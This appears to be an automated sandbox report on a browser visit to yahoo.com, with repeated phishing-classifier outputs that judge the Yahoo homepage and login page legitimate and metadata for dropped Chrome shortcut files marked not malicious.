                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "Globi"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["Yahoo"],
                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["Yahoo"],
                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"BEHIND EVERY GREAT",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"BEHIND EVERY GREAT",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"BEHIND EVERY GREAT",
                                                                                                                                                                                                                  "text_input_field_labels":["FEMA out of mon...",
                                                                                                                                                                                                                  "Biltmore Estat...",
                                                                                                                                                                                                                  "Hurricane Kirk",
                                                                                                                                                                                                                  "Russia-Ukraine",
                                                                                                                                                                                                                  "Milwaukee Brew...",
                                                                                                                                                                                                                  "Port Workers' S..."],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["Yahoo",
                                                                                                                                                                                                                  "Trump",
                                                                                                                                                                                                                  "FEMA",
                                                                                                                                                                                                                  "Biltmore Estate",
                                                                                                                                                                                                                  "Jobs Report",
                                                                                                                                                                                                                  "Hurricane Kirk",
                                                                                                                                                                                                                  "Longshoreman Sun",
                                                                                                                                                                                                                  "Russia-Ukraine",
                                                                                                                                                                                                                  "Seth Altman",
                                                                                                                                                                                                                  "Milwaukee Brew",
                                                                                                                                                                                                                  "Port Workers"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!/finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"BEHIND EVERY GREAT",
                                                                                                                                                                                                                  "text_input_field_labels":["FEMA out of mort...",
                                                                                                                                                                                                                  "Biltmore .",
                                                                                                                                                                                                                  "H urricane Kirk",
                                                                                                                                                                                                                  "Russia-Ukraine",
                                                                                                                                                                                                                  "Milwaukee Brew.."],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"IRS expands free tax program to 24 states,
                                                                                                                                                                                                                   Caitlin Clark wins Rookie of the Year  and more",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo"],
                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Mail",
                                                                                                                                                                                                                  "text_input_field_labels":["Globi"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "Globi"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["Globi"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":true,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"BEHIND EVERY GREAT",
                                                                                                                                                                                                                  "text_input_field_labels":["FEMA out of mon...",
                                                                                                                                                                                                                  "Biltmore Estat...",
                                                                                                                                                                                                                  "H urricane Kirk",
                                                                                                                                                                                                                  "Russia-Ukraine",
                                                                                                                                                                                                                  "Milwaukee Brew..."],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!/finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!/finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "yahoo!/finance"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"BEHIND EVERY GREAT",
                                                                                                                                                                                                                  "text_input_field_labels":["FEMA out of mort...",
                                                                                                                                                                                                                  "Biltmore Estat...",
                                                                                                                                                                                                                  "Hurricane Kirk",
                                                                                                                                                                                                                  "Russia-Ukraine",
                                                                                                                                                                                                                  "Milwaukee Brew...",
                                                                                                                                                                                                                  "Port Workersi"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo",
                                                                                                                                                                                                                  "finance"],
                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signin Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "Google"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Sign in",
                                                                                                                                                                                                                  "prominent_button_name":"Next",
                                                                                                                                                                                                                  "text_input_field_labels":["Username",
                                                                                                                                                                                                                  "email",
                                                                                                                                                                                                                  "or mobile"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signin Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "Google"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Sign in using your Yahoo account",
                                                                                                                                                                                                                  "prominent_button_name":"Next",
                                                                                                                                                                                                                  "text_input_field_labels":["Username",
                                                                                                                                                                                                                  "email",
                                                                                                                                                                                                                  "or mobile"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signin Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "phishing_score":1,
                                                                                                                                                                                                                  "brands":"yahoo!",
                                                                                                                                                                                                                  "legit_domain":"yahoo.com",
                                                                                                                                                                                                                  "classification":"wellknown",
                                                                                                                                                                                                                  "reasons":["The brand 'Yahoo!' is a well-known brand.",
                                                                                                                                                                                                                  "The URL 'login.yahoo.com' is a subdomain of 'yahoo.com',
                                                                                                                                                                                                                   which is the legitimate domain for Yahoo.",
                                                                                                                                                                                                                  "There are no suspicious elements in the URL such as misspellings or unusual domain extensions.",
                                                                                                                                                                                                                  "The input field 'Username' is typical for a login page associated with Yahoo."],
                                                                                                                                                                                                                  "brand_matches":[false],
                                                                                                                                                                                                                  "url_match":true,
                                                                                                                                                                                                                  "brand_input":"yahoo!",
                                                                                                                                                                                                                  "input_fields":"Username"}
                                                                                                                                                                                                                  URL: https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signin Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "phishing_score":1,
                                                                                                                                                                                                                  "brands":"yahoo!",
                                                                                                                                                                                                                  "legit_domain":"yahoo.com",
                                                                                                                                                                                                                  "classification":"wellknown",
                                                                                                                                                                                                                  "reasons":["The URL 'login.yahoo.com' is a subdomain of 'yahoo.com',
                                                                                                                                                                                                                   which is the legitimate domain for Yahoo.",
                                                                                                                                                                                                                  "Yahoo is a well-known brand with a strong online presence.",
                                                                                                                                                                                                                  "The URL does not contain any suspicious elements such as misspellings,
                                                                                                                                                                                                                   extra characters,
                                                                                                                                                                                                                   or unusual domain extensions.",
                                                                                                                                                                                                                  "The input field 'Username' is typical for a login page associated with Yahoo services."],
                                                                                                                                                                                                                  "brand_matches":[false],
                                                                                                                                                                                                                  "url_match":true,
                                                                                                                                                                                                                  "brand_input":"yahoo!",
                                                                                                                                                                                                                  "input_fields":"Username"}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 13:38:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2673
                                                                                                                                                                                                                  Entropy (8bit):3.9770421869676174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B6D7949099D088639061D6EF73DBD6E7
                                                                                                                                                                                                                  SHA1:69F1FCF54B0C636D3F2E0C4517831AEC09579F7A
                                                                                                                                                                                                                  SHA-256:4756740AF43B9013D326225728710BF029CEDA24CE0BAB6EC7453E84A7B2CBB6
                                                                                                                                                                                                                  SHA-512:162EE36D87427B15C590B59ADAE503ECDF322EA7FBEFF5ECDF6B989662E292564841E2FC5E4D96B61D98B8E3FA825A3DC6B0A04754885215A729CE365D7FD4BF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....c..k...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDY.t....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY.t....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY.t....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY.t..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY.t...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........-Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 13:38:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2675
                                                                                                                                                                                                                  Entropy (8bit):3.9965144674654796
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:31E4EB3570E12DB32FAEEBBA94863DAA
                                                                                                                                                                                                                  SHA1:0EF37CA818E615FC04A8C44092A7C0EFA55A307B
                                                                                                                                                                                                                  SHA-256:561FD7F98371F1D81B1C2156E3E0B02EE1E697DA952ED9F459CF3D88CDA94279
                                                                                                                                                                                                                  SHA-512:084131FD55F3CEAD445E58F3EBD3CEDEE444F1AE49FD35A30BCC2B9508935993C9A89131462FF4DB31691E7D8E2EA3457CF292C9193BE60B91EF13DEDE474D1B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,......~.k...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDY.t....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY.t....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY.t....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY.t..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY.t...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........-Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2689
                                                                                                                                                                                                                  Entropy (8bit):4.004971619870842
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:3D5D2CD1243A73CB08679C5A848B5428
                                                                                                                                                                                                                  SHA1:5B148E9E69FC030EE3D4E5F352F13233EE3FE8E8
                                                                                                                                                                                                                  SHA-256:ECDC7B8B9702106E5995E66A93A506169BDC5BD736A9F8431FC578C8325886E7
                                                                                                                                                                                                                  SHA-512:5E5212BC8623AEFFFF3F53527A77E00F5A444263B125F77842DB870C4EA6F1D3614B90F1F5C31CC920141CBA8311B8BD8CAE31C35E4B34BDCF2B58D53774776C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDY.t....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY.t....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY.t....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY.t..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........-Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 13:38:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                  Entropy (8bit):3.9921882825911235
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F3B77D7AFFA4410414EFEB60ACCA3E7C
                                                                                                                                                                                                                  SHA1:FF53CF699782B67E0E882A377372C43856544D08
                                                                                                                                                                                                                  SHA-256:4E9A16248382193D3EE2AA5B9C39A2BC2F32C4F6AC6E04C86C5EACC3293AEA79
                                                                                                                                                                                                                  SHA-512:B222A11079D17DE2781C5F6EBD0566EA9B2D8E3895658C33459ACC048D1AA91D6E8D89151F8C571CAF51440D7BD46B7A12BCB1EC35195E8697676885C3C73929
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....%y.k...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDY.t....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY.t....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY.t....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY.t..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY.t...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........-Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 13:38:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                  Entropy (8bit):3.980172750892606
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:41CBF5A04DE0A0C7A45BB27898130E5C
                                                                                                                                                                                                                  SHA1:25D8AD72BF156372435E71EC2F0BBD3DD72ED869
                                                                                                                                                                                                                  SHA-256:096C8D0DC79D357EC92F550CAA2C4D1036294411E633C0C70C91B25638A2C457
                                                                                                                                                                                                                  SHA-512:DBF56D22DDE40E146BFF2E7610011572527F0901E5FA538166022C1C7F588F5EB77AFEFB9D23E8380014B6A9565EBCEB015F50A2D31A3CAE50D6CCD6AB437118
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
